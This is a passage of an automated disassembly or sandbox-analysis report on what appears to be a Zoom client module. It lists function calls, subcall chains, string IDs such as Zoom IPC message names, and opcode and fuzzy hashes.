                  • Part of subcall function 00C84FAD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85075
                  • Part of subcall function 00C84FAD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request), ref: 00C850D3
                  • Part of subcall function 00C84FAD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction), ref: 00C850F0
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: MeetingID$cmd$com.Zoom.app.callcommand
                • API String ID: 2703795933-1204139483
                • Opcode ID: 727f27759f78041332d70fc966eccaef08e894dba149ad9766a39c1985665219
                • Instruction ID: 35faa826b44dd2c5bc12cdfc8cf70aae8d97f40a9e1a170df356b723d7d306ef
                • Opcode Fuzzy Hash: 727f27759f78041332d70fc966eccaef08e894dba149ad9766a39c1985665219
                • Instruction Fuzzy Hash: 23E09270614758ABE7106B45ACC6B2E63B5AB54B1DF9005ADF2015B3D1CAF40D84D774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74A37
                • ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.get.presence,00002780,UserList,Subscribe,00000004), ref: 00C74A57
                  • Part of subcall function 00C8CDD0: __EH_prolog3.LIBCMT ref: 00C8CDD7
                  • Part of subcall function 00C8CDD0: ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8CD32,?,?,?,?,00000004,00C8CC15,?,?,?,?,?), ref: 00C8CDEA
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: Subscribe$UserList$com.Zoom.app.conf.get.presence
                • API String ID: 2703795933-1589503580
                • Opcode ID: 3d5bfdfba13f6b411778b58fa83b9caf35f447b117297697406bb48bf9689cff
                • Instruction ID: aae2423359c08a65d5991c12f59ba86f6b4cd6736f92722e61d3a33e5f0e406f
                • Opcode Fuzzy Hash: 3d5bfdfba13f6b411778b58fa83b9caf35f447b117297697406bb48bf9689cff
                • Instruction Fuzzy Hash: 3BE092B0A85794ABD3217B849C4AB2A62A8DBA4B19F400438F1149F3D1CBF00D45DB7A
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76B87
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.conf.compliant.meeting.autocall.join,000027AE,call_number,participant_id,00000004), ref: 00C76BA7
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: call_number$com.zoom.conf.compliant.meeting.autocall.join$participant_id
                • API String ID: 9112088-1674436807
                • Opcode ID: 6e1c2c6dda72f97d6b6ed9f8f3898ba09fa0b14e88d41bc96b8ca1e6b7ec546b
                • Instruction ID: a0fde2fdddf41ef096fecb2545dfe9b87602989ef6acf3bfd3ccbeb9a9b41710
                • Opcode Fuzzy Hash: 6e1c2c6dda72f97d6b6ed9f8f3898ba09fa0b14e88d41bc96b8ca1e6b7ec546b
                • Instruction Fuzzy Hash: F0E022F1A04B98AFD3206B41AC0AB2E21B4AB50B2EF504478F2089F3D0CBF14D00DBB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76B27
                • ??0?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.ps.query.component.exist.result,0001388B,componentType,exist,00000004), ref: 00C76B47
                  • Part of subcall function 00C889D0: __EH_prolog3.LIBCMT ref: 00C889D7
                  • Part of subcall function 00C889D0: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C888F2,?,?,?,?,00000004,00C88825,?,?,?,?,?), ref: 00C889EA
                  • Part of subcall function 00C90AF2: __EH_prolog3_GS.LIBCMT ref: 00C90AF9
                  • Part of subcall function 00C90AF2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B1F
                  • Part of subcall function 00C90AF2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B4D
                  • Part of subcall function 00C90AF2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B8A
                  • Part of subcall function 00C90AF2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90BBA
                  • Part of subcall function 00C90AF2: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response), ref: 00C90C18
                  • Part of subcall function 00C90AF2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID), ref: 00C90C35
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.ps.query.component.exist.result$componentType$exist
                • API String ID: 3124793654-1839886085
                • Opcode ID: dbc46beb963961b48709c39a27572350728a170ad94cd7918b2c4853e05c8b43
                • Instruction ID: 14ffc6744be588b77e807e12297381b7b8fe2ee3545bfa65f4ff6cea9f4b0fe2
                • Opcode Fuzzy Hash: dbc46beb963961b48709c39a27572350728a170ad94cd7918b2c4853e05c8b43
                • Instruction Fuzzy Hash: 2DE022F0B807906BD7206B488C8AB2A22A4AB40B1AF640138B1009A381CFF00D40D379
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70C67
                • ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.audio.facility.status,00002754,FromApp,AudioDevType,00000004), ref: 00C70C87
                  • Part of subcall function 00C8A460: __EH_prolog3.LIBCMT ref: 00C8A467
                  • Part of subcall function 00C8A460: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6B29C,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A47A
                  • Part of subcall function 00C8A50D: __EH_prolog3_GS.LIBCMT ref: 00C8A514
                  • Part of subcall function 00C8A50D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                  • Part of subcall function 00C8A50D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                  • Part of subcall function 00C8A50D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                  • Part of subcall function 00C8A50D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: AudioDevType$FromApp$com.Zoom.app.conf.audio.facility.status
                • API String ID: 3124793654-2372748486
                • Opcode ID: 311f22b516c3140d6edfe23d05a4b7044a2b4c8fe9c5b005f0e35b5c66c8f33c
                • Instruction ID: 12061b3c768fe9244c7ae5c1f186bd2e6e80eca855d400af8cdd6b8b6ad738bc
                • Opcode Fuzzy Hash: 311f22b516c3140d6edfe23d05a4b7044a2b4c8fe9c5b005f0e35b5c66c8f33c
                • Instruction Fuzzy Hash: F5E09BB0A10394FBF711AB44DC86B2E7164AB90B5DF508539F1106A3D2C6F44C84D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74C77
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mesh.notification,000027B9,etype,value,00000004), ref: 00C74C97
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.mesh.notification$etype$value
                • API String ID: 2715420528-4260425333
                • Opcode ID: e2812ff2f218568f650b841768a466829bc76a3165e52a3b450f98fc48383d56
                • Instruction ID: 5593ac366743be07b82c6fb7e802f66a3c171fd15320fe19ec4e1304791121df
                • Opcode Fuzzy Hash: e2812ff2f218568f650b841768a466829bc76a3165e52a3b450f98fc48383d56
                • Instruction Fuzzy Hash: 45E092B0B44798ABE7256B456C4AB2E71B4EB50B19F504439B6145A3C1CBF00D44D7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CD47
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.suspend_to_resume,00009CC9,State,IpAddr,00000004), ref: 00C6CD67
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: IpAddr$State$com.zoom.app.assistant.sip.suspend_to_resume
                • API String ID: 2715420528-2108130886
                • Opcode ID: f285cb708f7e3b4f2eaf9942085a8244d4e336f9e328583d560aeb6e80aec1fa
                • Instruction ID: f67cd2ec0214e0dbc74beedfee3198e7cd7db7ad52f031f2c494351aefd9b3ee
                • Opcode Fuzzy Hash: f285cb708f7e3b4f2eaf9942085a8244d4e336f9e328583d560aeb6e80aec1fa
                • Instruction Fuzzy Hash: DCE092B4A50745BFD7207B465855F2F69A4EF50B1AF444428F1045E3C2CAF00C04C7F5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6ED47
                • ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.indentify.device.request,00009DDA,deviceID,deviceType,00000004), ref: 00C6ED67
                  • Part of subcall function 00C84F00: __EH_prolog3.LIBCMT ref: 00C84F07
                  • Part of subcall function 00C84F00: ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6752C,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C84F1A
                  • Part of subcall function 00C84FAD: __EH_prolog3_GS.LIBCMT ref: 00C84FB4
                  • Part of subcall function 00C84FAD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C84FDA
                  • Part of subcall function 00C84FAD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85008
                  • Part of subcall function 00C84FAD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85045
                  • Part of subcall function 00C84FAD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85075
                  • Part of subcall function 00C84FAD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request), ref: 00C850D3
                  • Part of subcall function 00C84FAD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction), ref: 00C850F0
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.indentify.device.request$deviceID$deviceType
                • API String ID: 2703795933-726637879
                • Opcode ID: 2567a83e2115180cc36e5f7abbf6ecd5b3ec904e5f9e411ecd2fab88208e2c0b
                • Instruction ID: 139ed43249ef0fe2aca582f30439b3cc93a8a586c7ac561a18a3cd017373b074
                • Opcode Fuzzy Hash: 2567a83e2115180cc36e5f7abbf6ecd5b3ec904e5f9e411ecd2fab88208e2c0b
                • Instruction Fuzzy Hash: ADE092B464069A7BE720BB885C46B2F2964EB91B5AF14442DB2005E3D2CBF00C40C779
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76ED7
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.notify.component.download.progress,000027B4,componentType,percentage,00000004), ref: 00C76EF7
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.app.notify.component.download.progress$componentType$percentage
                • API String ID: 3124793654-3701629925
                • Opcode ID: 1b69390f5b9185992e9b39b4901fbcd75ba4a2e13660ea9c46c28d16d99c8ed0
                • Instruction ID: 54650d498d01d91fd46281ccafa7e3f4da7dd5fbfbdf367931e53ee54b6b2dc3
                • Opcode Fuzzy Hash: 1b69390f5b9185992e9b39b4901fbcd75ba4a2e13660ea9c46c28d16d99c8ed0
                • Instruction Fuzzy Hash: 3FE06DF0A447A8AADB25BB51DC5AB2E66749B50B59F404578B104AA392CBF00D00EBB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C837
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlook.on.get.default.profile.notify,00009E69,strDefaultProfile,count,00000004), ref: 00C5C855
                  • Part of subcall function 00C5D960: __EH_prolog3.LIBCMT ref: 00C5D967
                  • Part of subcall function 00C5D960: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C5C85A,com.zoom.app.mapi.outlook.on.get.default.profile.notify,00009E69,strDefaultProfile,count,00000004), ref: 00C5D97A
                  • Part of subcall function 00C5DA1D: __EH_prolog3_GS.LIBCMT ref: 00C5DA24
                  • Part of subcall function 00C5DA1D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C5C881), ref: 00C5DA38
